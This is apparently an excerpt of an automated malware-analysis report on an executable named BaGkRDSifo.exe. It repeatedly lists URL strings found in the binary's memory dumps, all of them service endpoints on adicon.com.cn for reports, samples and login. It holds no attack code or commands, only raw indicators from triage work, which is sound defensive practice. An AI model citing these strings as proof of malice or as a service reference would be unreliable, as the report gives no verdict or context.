Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicByYYTMT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetByteReportByYYtmT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetByteReportT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetImageTestT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetInputXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportBaseInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportDetailByXmlDocumentT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportDetailStringDocumentT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconRepnoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportListV1T
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportUserItemByYYTMT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetReportUserItemT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSampleCountT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSampleProcessT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleAiT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleByOtherT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleToStringT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeToByteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetTsscInfoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/GetXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/LoginT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmlUpLoadT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmmcListT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ReportDetailForHzqbT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ReportDetailT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ReportDetailbybgrqT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/SelectItemsByCustomerT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByByAdiconRepnoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByCustomerBarocdeT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/T
